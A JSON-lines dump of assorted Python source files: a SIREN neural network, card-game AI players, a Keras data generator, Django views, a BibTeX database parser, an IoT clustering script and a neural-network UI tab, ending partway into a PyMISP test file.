+{"seq_id":"537934617","text":"##Working further with Siren, to experiment deeper with the network and see what really clicks.\n##Most of this taken from the siren-pytorch library, because I can't actually code lmao\n\nimport math\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom einops import rearrange\n\nfrom .utils import exists, enable\n\ndef cast_tuple(val, repeat = 1):\n return val if isinstance(val, tuple) else ((val,) * repeat)\n\n\n#Fourier features to be used on the input layer. thanks again alstro\n#May need to adjust std for optimal performance\nclass FourierFeatures(nn.Module):\n def __init__(self, in_features, out_features, std=1.):\n super().__init__()\n assert out_features % 2 == 0\n self.register_buffer('weight', torch.randn([out_features // 2, in_features]) * std)\n\n def forward(self, input):\n f = 2 * math.pi * input @ self.weight.T\n return torch.cat([f.cos(), f.sin()], dim=-1)\n\n#Custom activation. Will it work? ¯\\_(ツ)_/¯\n\nclass LayerActivation(nn.Module):\n def __init__(self, torch_activation=torch.sin, w0 = 1.):\n super().__init__()\n self.w0 = w0\n self.activation = torch_activation\n def forward(self, x):\n return self.activation(self.w0 * x)\n\n#aight I guess I have to just import the whole Siren module. 
okay then.\n\nclass SirenLayer(nn.Module):\n def __init__(self, dim_in, dim_out, w0 = 1., c = 6., is_first = False, use_bias = True, layer_activation=torch.sin, final_activation = None, num_linears=1, multiply=None):\n super().__init__()\n self.dim_in = dim_in\n self.is_first = is_first\n self.num_linears = num_linears\n self.multiply = multiply\n\n weight = torch.zeros(dim_out, dim_in)\n bias = enable(use_bias, torch.zeros(dim_out))\n self.init_(weight, bias, c = c, w0 = w0)\n\n self.weight = nn.Parameter(weight)\n self.bias = enable(use_bias, nn.Parameter(bias))\n self.activation = LayerActivation(torch_activation=layer_activation, w0=w0) if final_activation is None else final_activation\n\n def init_(self, weight, bias, c, w0):\n dim = self.dim_in\n\n w_std = (1 / dim) if self.is_first else (math.sqrt(c / dim) / w0)\n weight.uniform_(-w_std, w_std)\n\n if exists(bias):\n bias.uniform_(-w_std, w_std)\n\n def forward(self, x):\n for _ in range(self.num_linears):\n out = F.linear(x, self.weight, self.bias)\n if exists(self.multiply):\n out *= self.multiply\n out = self.activation(out)\n\n return out\n\n#because I don't wanna do 2 repos, here's a more \"open\" SirenNet class, and by that I mean just changing activations on the layers themselves lol\nclass SirenNetwork(nn.Module):\n def __init__(self, dim_in, dim_hidden, dim_out, num_layers, w0 = 1., w0_initial = 30., use_bias = True, layer_activation = None, final_activation = None, num_linears = 1, multiply=None, fourier=True):\n super().__init__()\n self.num_layers = num_layers\n self.dim_hidden = dim_hidden\n\n self.layers = nn.ModuleList([])\n\n #Fourier\n if fourier:\n self.layers.append(FourierFeatures(\n in_features = dim_in,\n out_features = dim_hidden\n ))\n else:\n self.layers.append(SirenLayer(\n dim_in = dim_in,\n dim_out = dim_hidden,\n w0 = w0_initial,\n use_bias = use_bias,\n is_first = True,\n layer_activation = None if not exists(layer_activation) else LayerActivation(torch_activation=layer_activation),\n num_linears=num_linears\n ))\n\n for ind in range(num_layers - 1):\n self.layers.append(SirenLayer(\n dim_in = dim_hidden,\n dim_out = dim_hidden,\n w0 = w0,\n use_bias = use_bias,\n layer_activation = None if not exists(layer_activation) else LayerActivation(torch_activation=layer_activation),\n num_linears=num_linears\n ))\n \n final_activation = nn.Identity() if not exists(final_activation) else final_activation\n self.last_layer = SirenLayer(dim_in = dim_hidden, dim_out = dim_out, w0 = w0, use_bias = use_bias, final_activation = final_activation, multiply=multiply)\n\n def forward(self, x, mods = None):\n mods = cast_tuple(mods, self.num_layers)\n\n for layer, mod in zip(self.layers, mods):\n x = layer(x)\n\n if exists(mod):\n x *= rearrange(mod, 'd -> () d')\n\n return self.last_layer(x)\n\n\nclass SirenWrapper(nn.Module):\n def __init__(self, net, image_width, image_height, latent_dim = None):\n super().__init__()\n assert isinstance(net, SirenNetwork), 'SirenWrapper must receive a Siren network'\n\n self.net = net\n self.image_width = image_width\n self.image_height = image_height\n\n self.modulator = None\n if exists(latent_dim):\n self.modulator = Modulator(\n dim_in = latent_dim,\n dim_hidden = net.dim_hidden,\n num_layers = net.num_layers\n )\n\n tensors = [torch.linspace(-1, 1, steps = image_width), torch.linspace(-1, 1, steps = image_height)]\n mgrid = torch.stack(torch.meshgrid(*tensors), dim=-1)\n mgrid = rearrange(mgrid, 'h w c -> (h w) c')\n\n self.register_buffer('grid', mgrid)\n\n def forward(self, img = 
None, *, latent = None):\n modulate = exists(self.modulator)\n assert not (modulate ^ exists(latent)), 'latent vector must be only supplied if `latent_dim` was passed in on instantiation'\n\n mods = self.modulator(latent) if modulate else None\n\n coords = self.grid.clone().detach().requires_grad_()\n out = self.net(coords, mods)\n out = rearrange(out, '(h w) c -> () c h w', h = self.image_height, w = self.image_width)\n\n if exists(img):\n return F.mse_loss(img, out)\n\n return out","sub_path":"deep_daze/siren.py","file_name":"siren.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648305875","text":"class Player():\r\n\r\n def __init__(self, num, name):\r\n # num = player number\r\n self.num = num\r\n # name = player name\r\n self.name = name\r\n # hand is the cards in the players hand\r\n self.hand = []\r\n # cc is the card count\r\n self.cc = 0\r\n # plan to use .active to determine the current turn\r\n self.active = False\r\n # .next on a player as a link to the next players turn maybe?\r\n self.next = self\r\n\r\n\r\n def drawFromDeck(self, deck):\r\n if len(deck) > 0:\r\n self.hand.append(deck.pop())\r\n self.cc += 1\r\n\r\n def newHand(self, deck, cardNum=7):\r\n for i in range(0, cardNum):\r\n self.drawFromDeck(deck)\r\n\r\n def nextstep(self, borad):\r\n move = input(\"What will you do? (h for help): \")\r\n return move.lower()\r\n\r\nclass BartokAIPlayer(Player):\r\n\r\n def nextstep(self, board):\r\n index = self.validIndexToPlay(board)\r\n if index == -1:\r\n return 'draw'\r\n else:\r\n return 'play ' + str(index)\r\n\r\n def validIndexToPlay(self, board):\r\n for i in range(len(self.hand)):\r\n if self.hand[i].sameSuit(board.top) or self.hand[i].sameNumber(board.top):\r\n return i\r\n return -1\r\n\r\nclass KingsAIPlayer(Player):\r\n def nextstep(self, board):\r\n action = self.validPlay(board)\r\n if action[0] == -1: #cannot play any card on hand\r\n action = self.validMove(board) #try to move card on board\r\n if action[0] == -1: #no valid move\r\n return 'end' #end the turn\r\n else: #valid move\r\n return 'move: ' + action[0] + ', ' + action[1]\r\n else: #valid play\r\n return 'play: ' + str(action[0]) + ', ' + action[1]\r\n\r\n def validPlay(self, board):\r\n #play K to the corner (get all the empty fields -> play K)\r\n fieldsName = ['n', 's', 'e', 'w']\r\n for i in range(len(self.hand)):\r\n if self.hand[i].val == 13:\r\n if board.boardDic['c1'].top.val == 0:\r\n return [i, 'c1']\r\n elif board.boardDic['c2'].top.val == 0:\r\n return [i, 'c2']\r\n elif board.boardDic['c3'].top.val == 0:\r\n return [i, 'c3']\r\n elif board.boardDic['c4'].top.val == 0:\r\n return [i, 'c4']\r\n\r\n # play the card to the empty field(not the corner)\r\n for name in fieldsName:\r\n if board.boardDic[name].top.val == 0:\r\n return [0, name]\r\n\r\n # play card to a non-empty field\r\n for key, field in board.boardDic.items():\r\n if field.top != 0: #the field is not empty\r\n for i in range(len(self.hand)): #check cards on hand\r\n if self.hand[i].diffColor(field.top) and self.hand[i].val == field.top.val - 1:\r\n return [i, key]\r\n\r\n #no card can be played\r\n return [-1, \"\"]\r\n\r\n\r\n def validMove(self, board):\r\n #move K to the corner\r\n fieldsName = ['n','s','e','w']\r\n allFieldsName = ['n', 's', 'e', 'w', 'c1', 'c2', 'c3', 'c4']\r\n cornerName = ['c1', 'c2', 'c3', 'c4']\r\n for name in fieldsName:\r\n if board.boardDic[name].bot.val == 13:\r\n for dest in cornerName:\r\n if 
board.boardDic[dest].top.val == 0:\r\n return [name, dest]\r\n\r\n #no K on the board to move: try to move fields\r\n for source in fieldsName:\r\n for destination in allFieldsName:\r\n sCard = board.boardDic[source].bot\r\n dCard = board.boardDic[destination].top\r\n if sCard.diffColor(dCard) and sCard.val == dCard.val - 1 :\r\n return [source, destination]\r\n return [-1, \"\"]","sub_path":"proj3rjwoods3postFSMandAI/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"66682693","text":"class Solution:\n def find_square(self, matrix, border):\n length_zero = len(matrix)\n length_one = len(matrix[0])\n mid = int(len(border)/2)\n temp_border = list()\n for i in range(len(border)):\n if i == mid:\n if border[i][0]+1 < length_zero and border[i][1]+1 < length_one:\n temp_border.append([border[i][0]+1, border[i][1]])\n temp_border.append([border[i][0]+1, border[i][1]+1])\n temp_border.append([border[i][0], border[i][1]+1])\n if i < mid:\n if border[i][0] + 1 < length_zero:\n temp_border.append([border[i][0]+1, border[i][1]])\n if i > mid:\n if border[i][1] + 1 < length_one:\n temp_border.append([border[i][0], border[i][1]+1])\n for e in temp_border:\n if matrix[e[0]][e[1]] == '0':\n return len(border)\n if len(temp_border) == len(border)+2:\n return len(border) + self.find_square(matrix,temp_border)\n else:\n return len(border)\n \n def maximalSquare(self, matrix: List[List[str]]) -> int:\n result = 0\n for rindex, row in enumerate(matrix):\n for cindex, col in enumerate(row):\n if col == '1':\n temp = self.find_square(matrix, [[rindex, cindex]])\n if result < temp:\n result = temp\n return result\n","sub_path":"2020_02_21/runroz_221.py","file_name":"runroz_221.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"535849150","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 8 18:54:31 2020\n\n@author: ryan\n\"\"\"\n\nimport os\nimport sys\nimport random\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nos.chdir(os.path.dirname(__file__))\n\nclass DataGen(keras.utils.Sequence):\n def __init__(self, ids,path, batch_size=8, image_size=128,form=\"tif\",shuffle=True,color=\"rgb\"):\n self.ids = ids\n self.path = path\n self.batch_size = batch_size\n self.image_size = image_size\n self.shuffle=shuffle\n self.on_epoch_end()\n self.form=form\n self.color=color\n \n def __load__(self, id):\n ## Path\n image_path1 = self.path+\"/image/\"+id+\".\"+self.form\n mask_path1 = self.path+\"/mask/\"+id+\"_mask.\"+self.form\n image_path2 = self.path+\"/image_aug/\"+id+\".\"+self.form\n mask_path2 = self.path+\"/mask_aug/\"+id+\"_mask.\"+self.form\n ## Reading Image and Mask\n if self.color==\"rgb\":\n image = cv2.imread(image_path1, 1)\n if type(image) is not np.ndarray:\n image = cv2.imread(image_path2, 1)\n if type(image) is not np.ndarray:\n raise ValueError([image_path2,image_path1])\n image = cv2.resize(image,(self.image_size, self.image_size))\n if self.color==\"gray\":\n image = cv2.imread(image_path1, 0)\n if type(image) is not np.ndarray:\n image = cv2.imread(image_path2, 0)\n if type(image) is not np.ndarray:\n raise ValueError([image_path2,image_path1])\n image = cv2.resize(image,(self.image_size, self.image_size))\n image=np.expand_dims(image,axis=-1)\n 
mask=cv2.imread(mask_path1,0)\n if type(mask) is not np.ndarray:\n mask=cv2.imread(mask_path2,0)\n if type(mask) is np.ndarray:\n mask=cv2.resize(mask, (self.image_size, self.image_size))\n mask=np.expand_dims(mask, axis=-1)\n mask = mask/255.0\n else:\n mask=image\n mask=mask>0\n ## Normalizaing \n image = image/255.0\n \n \n return image, mask\n \n def __getitem__(self, index):\n if (index+1)*self.batch_size > len(self.ids):\n files_batch = self.indexs[index*self.batch_size:]\n else:\n files_batch = self.indexs[index*self.batch_size:(index+1)*self.batch_size]\n \n image = []\n mask = []\n \n for index in files_batch:\n _img,_mask=self.__load__(index)\n image.append(_img)\n mask.append(_mask)\n \n image = np.array(image)\n mask = np.array(mask)\n \n return image, mask\n \n \n def on_epoch_end(self):\n self.indexs = self.ids\n if self.shuffle == True:\n np.random.shuffle(self.indexs)\n \n def __len__(self):\n return int(np.floor(len(self.ids)/float(self.batch_size)))","sub_path":"MedicalImage/data_generate.py","file_name":"data_generate.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"264169009","text":"#-*- coding:UTF-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom models import user\nfrom models import content\n\n\ndef index(request):\n\tpass\n\ndef add_user(request):\n\tname = request.GET.get('name')\n\tsex = request.GET.get('sex')\n\tnew_user = user(name=name, sex=sex)\n\tnew_user.save()\n\tsex_cn ={\n\t\t\"1\":u\"男\",\n\t\t\"0\":u\"女\",\n\t}\n\treturn HttpResponse(\"OK,%s %s\"% (name,sex_cn[sex]))\n\ndef register(request):\n\tblog_content = content.objects.get(pk=6)\n\tblogs =[\n\t\t\t{\n\t\t\t\t'id':blog_content.id,\n\t\t\t\t'title':'我是标题1',\n\t\t\t\t'pubDate':blog_content.update_time,\n\t\t\t\t'author':{\n\t\t\t\t\t'name':blog_content.author,\n\t\t\t\t},\n\t\t\t\t'content':blog_content.content,\n\t\t\t},\n\t\t ]\n\n\tdata = {\n\t\t'blogs':blogs,\n\t}\n\treturn render_to_response('base.html', data)\n\n\n\n","sub_path":"temp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443148138","text":"import time\nimport datetime\nimport psycopg2\nimport bibtexparser\n\n# this is an application for pars all metadataes from bibtex and insert in table\nLOG = \"C:/Users/hosseiam/PycharmProjects/hash_generator/logfile.log\"\n#LOG = \"/home/azamh/pythonFiles/hash_generator/logfile.log\"\n#================= public arguments==============================\nconString = \"dbname='dbexcitetest' user='postgres' host='localhost' password='sql!123'\"\n\ndef select_data(conn, cur ):\n t0 = time.time()\n\n print(\"Select Data from Table is in Progress ....\")\n\n # cur.execute(\"\"\"SELECT * FROM ES_newmodel_Bibtexes where ref_id = 15111 limit 1\"\"\")\n cur.execute(\"\"\"SELECT * FROM ES_newmodel_Bibtexes where ref_bibtex like '%pmid%'\"\"\")\n rows = cur.fetchall()\n # print(\"rows number: \", len(rows))\n row_count = 0\n l_dic_query = []\n for row in rows:\n # ref_id , ref_bibtex\n temp_ref_entit = {}\n\n ref_id = row[0]\n ref_bibtex = row[1]\n\n temp_ref_entit['ref_id'] = ref_id\n temp_ref_entit['ref_bibtex'] = ref_bibtex\n temp_ref_entit['author_name'] = []\n temp_ref_entit['year'] = []\n temp_ref_entit['title'] = ''\n temp_ref_entit['journals'] = []\n temp_ref_entit['pages'] = ''\n temp_ref_entit['volume'] = ''\n 
temp_ref_entit['numbers'] = ''\n temp_ref_entit['doi'] = ''\n temp_ref_entit['pmid'] = ''\n temp_ref_entit['ID'] = ''\n temp_ref_entit['others'] = ''\n\n l_dic_query.append(temp_ref_entit)\n t_dic_query = tuple(l_dic_query)\n t1 = time.time()\n total = t1 - t0\n print(\"Select Process Time : \", total)\n return t_dic_query\n\ndef es_newmodel_bibtexes_20171020(conn, cur, insertdict ):\n # print (insertdict)\n # ref_id integer, ref_bibtex text, author_name text[], year text[], title text, journals text[], pages text, volume text, numbers text, doi text, pmid text, others text\n query = \"\"\"INSERT INTO es_newmodel_bibtexes_20171020 (ref_id, ref_bibtex, author_name, year, title, journals, pages, volume, numbers, doi, pmid , ID , others)\n VALUES (%(ref_id)s, %(ref_bibtex)s, %(author_name)s, %(year)s, %(title)s, %(journals)s, %(pages)s, %(volume)s, %(numbers)s, %(doi)s, %(pmid)s, %(ID)s, %(others)s)\"\"\"\n # print (\"ben_test2:\"+str(query))\n cur.execute(query, insertdict)\n conn.commit()\n\ndef bibtex_parser(lsofRecords):\n # we need ref_id and ref_bibtex from this record\n ref_id = lsofRecords['ref_id']\n ref_bibtex = lsofRecords['ref_bibtex']\n # print(\"ref_id is : \", lsofRecords['ref_id'])\n print(lsofRecords['ref_bibtex'])\n\n dic_temp = {}\n\n # using bibtexparser to parse bibtex to extract author, title, year, journal\n bib_database = bibtexparser.loads(ref_bibtex)\n for item1 in bib_database.entries:\n author_name = []\n year = []\n journals = []\n title = \"\"\n others = \"\"\n # author_name, year, title, journals, pages, volume, numbers, doi, pmid, others\n if ('author' in item1.keys()):\n author_name = item1['author'].split(',')\n # print(\"authors is: \", author_name)\n if ('year' in item1.keys()):\n year = item1['year'].split(',')\n # print(\"year is: \", year)\n if ('title' in item1.keys()):\n title = item1['title']\n # print(\"title is: \",title)\n if ('journal' in item1.keys()):\n journals = item1['journal'].split(',')\n # print(\"journals is: \", journals)\n pages = \"\"\n if ('pages' in item1.keys()):\n pages = item1['pages']\n # print(\"pages is: \",pages)\n volume = \"\"\n if ('volume' in item1.keys()):\n volume = item1['volume']\n # print(\"volume is: \",volume)\n numbers = \"\"\n if ('number' in item1.keys()):\n numbers = item1['number']\n # print(\"numbers is: \",numbers)\n doi = \"\"\n if ('doi' in item1.keys()):\n doi = item1['doi']\n # print(\"doi is: \",doi)\n pmid = \"\"\n if ('pmid' in item1.keys()):\n pmid = item1['pmid']\n # print(\"pmid is: \",pmid)\n ID = \"\"\n if ('ID' in item1.keys()):\n ID = item1['ID']\n # print(\"pmid is: \",pmid)\n\n # dedicate extra fields to others field\n others_key = list(set(item1.keys()) - set(['author','year','title', 'journal','pages','volume','number','doi','pmid','ID', 'ENTRYTYPE']))\n temp_other = {}\n for item_key in others_key:\n temp_other[item_key] = item1[item_key]\n others = str(temp_other)\n # print(\"other is: \", others)\n\n # ref_id , ref_bibtex , author_name , year , title , others , journals );\n dic_temp['ref_id'] = ref_id\n dic_temp['ref_bibtex'] = ref_bibtex\n dic_temp['author_name'] = author_name\n dic_temp['year'] = year\n dic_temp['title'] = title\n dic_temp['pages'] = pages\n dic_temp['volume'] = volume\n dic_temp['numbers'] = numbers\n dic_temp['doi'] = doi\n dic_temp['pmid'] = pmid\n dic_temp['ID'] = ID\n dic_temp['journals'] = journals\n dic_temp['others'] = others\n\n\n return dic_temp\n\ndef main_func():\n logf = open(LOG, \"a\")\n # select in database\n conn = psycopg2.connect(conString)\n cur = 
conn.cursor()\n refid2 = 0\n try:\n # call function --> insert_into_SSOAR_references\n lsofRecords = select_data(conn, cur)\n\n Max_rec = len(lsofRecords)\n print(\"number of recordes is : {}\".format(Max_rec))\n\n t0 = time.time()\n row = 0\n for item0 in lsofRecords:\n print(\"==================================================================\")\n print(\"row is : \", row)\n # pars\n dic_for_insert = bibtex_parser(lsofRecords[row])\n # insert\n # es_newmodel_bibtexes_20171020(conn, cur, dic_for_insert)\n row = row + 1\n t1 = time.time()\n total = t1 - t0\n print(\"pars and insert in table process Time : \", total)\n\n\n\n except Exception as e:\n Error = str(e.args)\n logf.write(\"Error: {0}, {1}, ref_id {2},{3} \\n\".format(str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time()), str(row), Error))\n print(e.args)\n\nif __name__ == \"__main__\":\n main_func()","sub_path":"python/ParsBibTex/FullPars.py","file_name":"FullPars.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386347916","text":"import numpy as np\n\n\ndef circle(canvas, center, radius, state_circle, background_circle, outline_circle):\n \"\"\"\n This function creates a circle item in the canvas.\n\n :param canvas: Canvas where the circle will be created\n :type canvas: tkinter.Canvas\n :param center: Coordinates of the circle's center in the Canvas\n :type center: tuple\n :param radius: Corresponds to the radius of the circle\n :type radius: int\n :param state_circle: Displays the circle's item if it takes True\n :type state_circle: boolean\n :param background_circle: Color of the circle's background\n :type background_circle: str\n :param outline_circle: Color of the circle's line\n :type outline_circle: str\n :return: Returns the Canvas widget\n :rtype: tkinter.Canvas\n \"\"\"\n if (state_circle):\n xC, yC = center\n A = (xC-radius, yC-radius)\n B = (xC+radius, yC+radius)\n canvas.create_oval(A, B, width=1, fill=background_circle,\n outline=outline_circle)\n return canvas\n\n\ndef coord(x, y, a, b):\n \"\"\"\n Gives the coordinates to change the landmark for one point (integer\n numbers).\n\n :return: Returns coordinates of one point in the Canvas landmark\n :rtype: tuple\n :Example:\n \\n\n >>> coord(200,200,40,60)\n (260,160)\n \"\"\"\n return(x+b, y-a)\n\n\ndef angle_tab(radius, graph):\n \"\"\"\n Returns a list of coordinates in the basic landmark which gives the\n coordinates of each vertex. Vertices are proportionally spaced\n (t = 2*pi/modulo number).\n\n :param radius: Radius of the circle\n :type radius: int\n :param graph: Graph object which gives the modulo number\n :type graph: multiplication_table.process_math.Graph.Graph\n :return: Returns a list of coordinates of all vertices\n :rtype: list\n \"\"\"\n t = (2*np.pi)/(graph.mod)\n angle = [None] * graph.mod*100\n for k in range(graph.mod*100):\n angle[k] = (radius*np.cos(k*t/100), radius*np.sin(k*t/100))\n return angle\n\n\ndef dot(canvas, graph, radius, center, color_graph, color_name):\n \"\"\"\n Adds the number of dots needed on the circle thanks to the\n :py:meth:`angle_tab` function. 
These points are proportionally spaced.\n Also, it calls :py:meth:`name_vertices` function which associates,\n for each dot, a number.\n\n :param canvas: Canvas where the dots items will be created\n :type canvas: tkinter.Canvas\n :param graph: Graph object which gives the modulo number \n :type graph: multiplication_table.process_math.Graph.Graph \n :param radius: Corresponds to the circle's radius\n :type radius: int\n :param center: Center of the circle in the Canvas\n :type center: int\n :param color_graph: List of colors to change the dots color\n :type color_graph: list\n :param color_name: Color of text items which represent the name of dots\n :type color_name: str\n :return: Returns the Canvas widget\n :rtype: tkinter.Canvas\n \"\"\"\n col = 0\n if (graph.mod <= 150):\n angle = angle_tab(radius, graph)\n for j in np.arange(0, len(angle), 100):\n a, b = angle[j]\n A = coord(center-3, center-3, a, b)\n B = coord(center+3, center+3, a, b)\n # create modulo_number circles (R=3)\n canvas.create_oval(A, B, fill=color_graph[col])\n col = (col + 1) % len(color_graph)\n name_vertices(canvas, radius, graph, center, color_name)\n return canvas\n\n\ndef name_vertices(cnv, radius, graph, center, color_name):\n \"\"\"\n Adds a name, for each vertex, around the circle.\n\n :param cnv: Canvas where the name will be added\n :type cnv: tkinter.Canvas\n :param radius: Corresponds to the circle's radius\n :type radius: int\n :param center: Center of the circle in the canvas\n :type center: int\n :param color_name: Color of text items\n :type color_name: str\n :return: Returns the Canvas widget\n :rtype: tkinter.Canvas\n \"\"\"\n angle = angle_tab(radius+17, graph)\n for j in np.arange(0, len(angle), 100):\n a, b = angle[j]\n Dots_C = (center+b, center-a)\n if (graph.mod <= 150):\n size = str(int(min(18, 16*62/graph.mod)))\n cnv.create_text(Dots_C, text=str(int(j/100)),\n font=\"Arial \" + size + \" bold\", fill=color_name)\n return cnv\n","sub_path":"package_table/build/lib/multiplication_table/process_vis/base_vis.py","file_name":"base_vis.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"551064722","text":"import numpy as np\nimport pandas as pd\nimport networkx as nx\nimport random\nimport time\nimport copy\nimport matplotlib.pyplot as plt\nimport scipy\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LinearRegression\nfrom xgboost import XGBClassifier\nfrom infomap import Infomap\n\n\nmanuTolabel={'SmartThings': 0, 'Amazone': 1, 'Netatmo': 2, 'TP-Link': 3, 'Samsung': 4, 'Google': 5, 'Insteon': 6, 'Withings': 7, 'Belkin': 8, 'Apple': 9, 'Nest': 10, 'Blipcare': 11, 'Lifx': 12, 'Triby': 13, 'Pixstar': 14, 'HP': 15}\n#usageTolabel\nmanuTolabel={'Computer': 0, 'Others': 1, 'Monitor': 2}\nMACTono={'d0:52:a8:00:67:5e': 0, '44:65:0d:56:cc:d3': 1, '70:ee:50:18:34:43': 2, 'f4:f2:6d:93:51:f1': 3, '00:16:6c:ab:6b:88': 4, '30:8c:fb:2f:e4:b2': 5, '00:62:6e:51:27:2e': 6, 'e8:ab:fa:19:de:4f': 7, '00:24:e4:11:18:a8': 8, 'ec:1a:59:79:f4:89': 9, '50:c7:bf:00:56:39': 10, '74:c6:3b:29:d7:1d': 11, 'ec:1a:59:83:28:11': 12, '18:b4:30:25:be:e4': 13, '70:ee:50:03:b8:ac': 14, '00:24:e4:1b:6f:96': 15, '74:6a:89:00:2e:25': 16, '00:24:e4:20:28:c6': 17, 'd0:73:d5:01:83:08': 18, '18:b7:9e:02:20:44': 19, 'e0:76:d0:33:bb:85': 20, '70:5a:0f:e4:9b:c0': 21, '08:21:ef:3b:fc:e3': 22, '30:8c:fb:b6:ea:45': 23, '40:f3:08:ff:1e:da': 24, '74:2f:68:81:69:42': 25, 
'ac:bc:32:d4:6f:2f': 26, 'b4:ce:f6:a7:a3:c2': 27, 'd0:a6:37:df:a1:e1': 28, 'f4:5c:89:93:cc:85': 29, '14:cc:20:51:33:ea': 30}\nnoToMAC={v:k for k,v in MACTono.items()}\ndef shuffle(data,label): \n index = [i for i in range(len(data))] \n random.shuffle(index) \n data = data[index]\n label = label[index] \n return data,label\n\ndef predict(x):\n return np.round(cls.predict(x))\ndef getA(name):\n G=nx.read_gexf(name)\n A=nx.adjacency_matrix(G)\n A=np.array(A.toarray())\n A=A/np.linalg.norm(A,ord=2)\n labels=[]\n ct=0\n for n in G.nodes(data=True):\n manu=n[1]['manu']\n labels.append(manu)\n im=Infomap('--directed')\n for edge in G.edges(data='weight'):\n s=edge[0]\n t=edge[1]\n #print(s,t,edge[2])\n im.add_link(int(s),int(t),edge[2])\n im.run()\n temp=np.zeros(len(labels))\n for node_id,module_id in im.modules:\n temp[node_id]=module_id\n y=[]\n for node in G.nodes():\n y.append(temp[int(node)])\n return np.array(y),np.array(labels)\n\ndef matchpredict(y,labels):\n match=np.zeros((int(max(y))+1,max(labels)+1))\n for yy,ll in zip(y,labels):\n match[int(yy)][ll]+=1\n predicttotrue=np.zeros(match.shape[0])\n for i in range(predicttotrue.shape[0]):\n predicttotrue[i]=np.argmax(match[i])\n y_=np.zeros(y.shape[0])\n for i,yy in enumerate(y):\n y_[i]=predicttotrue[int(yy)]\n return y_\n\ndef calculate(y,labels):\n ct=0\n rt=0\n for i in range(labels.shape[0]-1):\n for j in range(i+1,labels.shape[0]):\n if (labels[i]==labels[j])==(y[i]==y[j]):\n rt+=1\n ct+=1\n return rt/ct\n\ny,labels=getA('org.gexf')\ny=matchpredict(y,labels)\nprint(calculate(y,labels))\nprint(y)\ny,labels=getA('new.gexf')\ny=matchpredict(y,labels)\nprint(calculate(y,labels))\nprint(y)\n","sub_path":"classify/Facebook/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"225531321","text":"from django.conf.urls import patterns, url\n\n\nurlpatterns = patterns('sponsors.views',\n url(r'^$', 'list_sponsors',\n name='sponsors_list_sponsors'),\n url(r'^view/(?P[-a-zA-Z0-9]+)/$', 'view_sponsor',\n name='sponsors_view_sponsor'),\n)\n\n","sub_path":"sponsors/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228367376","text":"from PymoNNto.Exploration.Network_UI.TabBase import *\n\n\nclass afferent_syn_attr_plot_tab(TabBase):\n\n def __init__(self, syn_vars, title='Aff Syn',timesteps=500):\n super().__init__(title)\n self.syn_vars=syn_vars\n self.timesteps=timesteps\n\n def add_recorder_variables(self, neuron_group, Network_UI):\n self.check={}\n for syn_var in self.syn_vars:\n self.check[syn_var] = True\n for syn in neuron_group.afferent_synapses[\"All\"]:\n if not hasattr(syn, syn_var):\n self.check[syn_var] = False\n if self.check[syn_var]:\n Network_UI.add_recording_variable(neuron_group, '[np.sum(s.'+syn_var+') for s in n.afferent_synapses[\"All\"]]', timesteps=self.timesteps)\n\n def initialize(self, Network_UI):\n self.weight_tab = Network_UI.Next_Tab(self.title)\n\n self.plots = {}\n for syn_var in self.syn_vars:\n _, syn_plt = Network_UI.Add_plot_curve('Neuron Group average ' + syn_var, return_plot=True, x_label='t (iterations)', y_label='Input')\n self.plots[syn_var] = syn_plt\n\n\n\n def update(self, Network_UI):\n if self.weight_tab.isVisible():\n\n group = Network_UI.selected_neuron_group()\n\n for syn_var in self.syn_vars:\n\n if self.check[syn_var]:\n\n 
self.plots[syn_var].clear()\n\n recorded = group['[np.sum(s.'+syn_var+') for s in n.afferent_synapses[\"All\"]]'][-self.timesteps:]\n iterations = group['n.iteration', 0, 'np'][-self.timesteps:]\n if len(recorded) > 0:\n inputs = np.array(recorded[0])\n ident=[s.src.group_without_subGroup() for s in group.afferent_synapses[\"All\"]]\n single_ident = list(set(ident))\n\n for i, si in enumerate(single_ident):\n mask = [id == si for id in ident]\n\n data = np.sum(inputs[:, mask], axis=1)\n curve = pg.PlotCurveItem(iterations, data, name='', pen=si.color)#self.slow_input_colors[i]\n self.plots[syn_var].addItem(curve)\n","sub_path":"Exploration/Network_UI/Advanced_Tabs/afferent_syn_attr_plot_tab.py","file_name":"afferent_syn_attr_plot_tab.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272423073","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport sys\nimport unittest\nimport subprocess\n\nimport urllib3\nimport logging\nlogging.disable(logging.CRITICAL)\n\ntry:\n from pymisp import ExpandedPyMISP, MISPOrganisation, MISPUser, MISPServer\nexcept ImportError:\n if sys.version_info < (3, 6):\n print('This test suite requires Python 3.6+, breaking.')\n sys.exit(0)\n else:\n raise\n\nkey = 